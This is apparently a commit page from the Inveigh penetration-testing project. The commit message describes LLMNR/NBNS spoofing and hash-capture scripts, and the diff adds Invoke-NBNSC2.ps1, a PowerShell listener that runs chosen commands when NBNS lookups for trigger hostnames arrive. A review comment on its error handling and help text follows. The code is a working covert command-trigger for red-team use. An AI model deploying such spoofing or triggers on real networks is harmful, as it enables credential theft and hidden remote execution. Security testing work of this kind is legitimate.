authorKevin Robertson <robertsonk@gmail.com>2016-09-13 18:58:15 -0400
committerKevin Robertson <robertsonk@gmail.com>2016-09-13 18:58:15 -0400
commit73e2f3d442fc63925fa79a980fbce9d5c8a571af (patch)
tree0dc9f25574b966418e93f8e56098820b8db97457 /Extras/Invoke-NBNSC2.ps1
parent747b0d1f2fff960e378776a3cdcc9fd857a387dc (diff)
Inveigh 1.21.2
1. Added Inveigh-Unprivileged.ps1 (replaces Inveigh-BruteForce.ps1) – This script contains only LLMNR/NBNS spoofing and hash capture methods that do not require local admin access. The NBNS spoofer can be used without disabling the local NBNS service. The LLMNR spoofer does require stopping (needs admin) the local service and freeing up port 5355. It will work without admin on a system with LLMNR disabled. Note that there can still be system configurations that will prevent Inveigh-Unprivileged from working, and require admin access to change (e.g. local firewall blocking traffic, LLMNR enabled). This script replaces Inveigh-BruteForce and contains the same functionality. 2. Inveigh.ps1 Updates - Added a learning mode (SpooferLearning parameter) to Invoke-Inveigh that will attempt to avoid spoofing requests for valid hostnames. If enabled, Inveigh will send out LLMNR/NBNS requests for hostnames received through incoming LLMNR/NBNS requests. If Inveigh receives a response for a sent request, it will add the hostname to a blacklist. Added some code to help keep track of the SMB capture sequence. Removed the ability to launch Invoke-InveighRelay directly from an Invoke-Inveigh command line. 3. Inveigh-Relay.ps1 Status - This one is due for an overhaul. I'm also considering trying to convert it to not require admin access. No real changes on this pass though. It will work with either Invoke-Inveigh (-HTTP N and/or -HTTPS N) or Invoke-InveighUnprivileged (-HTTP N) as long as the target system supports SMB1. 4. Support Functions - Merged all of the small Get functions into Get-Inveigh. 5. Extras – Added an extras directory for functions that don't fit the main scripts. a. Send-NBNSResponse – This function sends a crafted NBNS response packet to a specific target. For name resolution to be successful, the specified TargetIP, Hostname, and TransactionID must match a very (very very) recent NBNS request.
You must have an external method (wireshark,etc) of viewing the required NBNS request fields for traffic on the target subnet. The odds of pulling this attack off manually are slim due to the narrow response window. I've only been able to get it to work manually by watching tshark with the the transaction ID being listed in the output. Ideally, this function would be fed by another script. b. Send-LLMNResponse – Just like Send-NBNSResponse but even harder to use manually. c. Invoke-NBNSC2 - Invoke-NBNSC2 will listen for NBNS requests and execute set commands if requests for specific hostnames are received. The function must be supplied with an even number of Hostnames and Commands. NBNS requests can be sent from a NBNS enabled system on the same subnet using ping, etc.
Diffstat (limited to 'Extras/Invoke-NBNSC2.ps1')
-rw-r--r--Extras/Invoke-NBNSC2.ps1151
1 files changed, 151 insertions, 0 deletions
diff --git a/Extras/Invoke-NBNSC2.ps1 b/Extras/Invoke-NBNSC2.ps1
new file mode 100644
index 0000000..41d2e64
--- /dev/null
+++ b/Extras/Invoke-NBNSC2.ps1
@@ -0,0 +1,151 @@
+function Invoke-NBNSC2
+{
+<#
+.SYNOPSIS
+Invoke-NBNSC2 will listen for NBNS requests and execute set commands if requests for specific hostnames are
+received. The function must be supplied with an even number of Hostnames and Commands. NBNS requests can be
+sent from a NBNS enabled system on the same subnet using ping, etc.
+
+.PARAMETER Hostnames
+A comma separated list of Hostnames that will trigger a corresponding command. The first hostname trigger a command
+from the Commands array with a matching index (e.g. Hostnames[0] executes Commands[0]).
+
+.PARAMETER Commands
+An array of commands stored in scriptblock format. All commands must be enclosed in {} brackets.
+
+.PARAMETER ExitHostname
+Specify a hostname that will cause the function to exit. This hostname must not match a hostname used in Hostnames.
+
+.PARAMETER RunTime
+(Integer) Set the run time duration.
+
+.PARAMETER RunTimeUnit
+Default = Minutes: Set the time unit for RunTime to either Minutes, Hours, or Days.
+
+.EXAMPLE
+Send-NBNSC2 -Hostnames test1,test2 -Command {calc},{notepad} -RunTime 1 -RunTimeUnit Days
+
+.LINK
+https://github.com/Kevin-Robertson/Inveigh
+#>
+
+[CmdletBinding()]
+param
+(
+[parameter(Mandatory=$true)][Array]$Hostnames = "",
+[parameter(Mandatory=$true)][Array]$Commands = "",
+[parameter(Mandatory=$true)][String]$ExitHostname = "",
+[parameter(Mandatory=$false)][Int]$RunTime="",
+[parameter(Mandatory=$false)][ValidateSet("Minutes","Hours","Days")][String]$RunTimeUnit="Minutes",
+[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if ($invalid_parameter)
+{
+ throw "$($invalid_parameter) is not a valid parameter."
+}
+
+if($Hostnames.Count -ne $Commands.Count)
+{
+ throw "Must use an equal number of Hostnames and Commands."
+}
+elseif($Hostnames -contains $ExitHostname)
+{
+ throw "ExitHostname cannot be used as in Hostnames."
+}
+
+if($RunTime)
+{
+ if($RunTimeUnit -like 'Minutes')
+ {
+ $runtime_timeout = new-timespan -Minutes $RunTime
+ }
+ elseif($RunTimeUnit -like 'Hours')
+ {
+ $runtime_timeout = new-timespan -Hours $RunTime
+ }
+ elseif($RunTimeUnit -like 'Days')
+ {
+ $runtime_timeout = new-timespan -Days $RunTime
+ }
+
+ $runtime_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+}
+
+$Hostnames = $Hostnames | % {$_.ToUpper()}
+$running = $true
+$NBNS_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Broadcast,137)
+$NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
+$NBNS_UDP_client.Client.ReceiveTimeout = 10000
+$control_timeout = new-timespan -Seconds 1
+$control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+
+while($running)
+{
+ try
+ {
+ $NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint)
+ }
+ catch
+ {
+ $NBNS_request_data = $null
+ }
+
+ if($NBNS_request_data)
+ {
+ $NBNS_query = [System.BitConverter]::ToString($NBNS_request_data[13..($NBNS_request_data.Length - 4)])
+ $NBNS_query = $NBNS_query -replace "-00",""
+ $NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length)
+ $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA"))
+ $NBNS_query_string_subtracted = ""
+ $NBNS_query_string = ""
+ $n = 0
+
+ if($NBNS_query_string_encoded.Length -gt 1)
+ {
+ do
+ {
+ $NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65)
+ $NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16))
+ $n += 1
+ }
+ until($n -gt ($NBNS_query_string_encoded.Length - 1))
+
+ $n = 0
+
+ do
+ {
+ $NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16)))
+ $n += 2
+ }
+ until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15)
+ }
+
+ if([Array]::IndexOf($Hostnames,$NBNS_query_string) -ge 0 -and $control_stopwatch.Elapsed -ge $control_timeout)
+ {
+ $NBNS_UDP_client.Close()
+ $command_index = [Array]::IndexOf($Hostnames,$NBNS_query_string)
+ $NBNS_query_string = ''
+ & $Commands[$command_index]
+ $control_timeout = new-timespan -Seconds 5
+ $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
+ $NBNS_UDP_client.Client.ReceiveTimeout = 10000
+ }
+ elseif($ExitHostname -like $NBNS_query_string)
+ {
+ $running = $false
+ }
+ }
+
+ if($RunTime -and $runtime_stopwatch.Elapsed -ge $runtime_timeout)
+ {
+ $running = $false
+ }
+
+}
+
+$NBNS_UDP_client.Close()
+
+} \ No newline at end of file
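Review bot: The query-name decoding at the top of the receive branch (the `[13..($NBNS_request_data.Length - 4)]` slice through the `Substring(0, IndexOf("CA"))` call) sits outside the only try/catch, which covers just `Receive`; a datagram on UDP 137 shorter than 17 bytes, or one whose encoded name carries no `CA` pair (likely also a full 15-character name with no space padding), makes `IndexOf` return -1 and `Substring` throw, so a single malformed or non-query packet ends the `while` loop with an unhandled exception and the final `$NBNS_UDP_client.Close()` is never reached. Wrapping the decoding in its own try/catch that leaves `$NBNS_query_string` empty keeps the listener running and lets the `RunTime` check still execute, as sketched below. Separately, the `.EXAMPLE` names the function `Send-NBNSC2` and the parameter `-Command`, while the code defines `Invoke-NBNSC2` with `-Commands`; it should read `Invoke-NBNSC2 -Hostnames test1,test2 -Commands {calc},{notepad} -RunTime 1 -RunTimeUnit Days`. The help should also state that the hostname match is the only gate, so any host on the subnet that resolves one of the trigger names, whether deliberately or through an ordinary lookup collision, fires the corresponding command.
```powershell
    if($NBNS_request_data)
    {
        $NBNS_query_string = ""

        try
        {
            # … unchanged: first-level decoding of the NBNS query name (BitConverter/Split/Substring loops) …
        }
        catch
        {
            # A datagram that is not a well-formed NBNS query must not take the listener down;
            # treat it as "no match" and keep receiving.
            $NBNS_query_string = ""
        }

        # … unchanged: Hostnames / ExitHostname matching and command dispatch …
    }
```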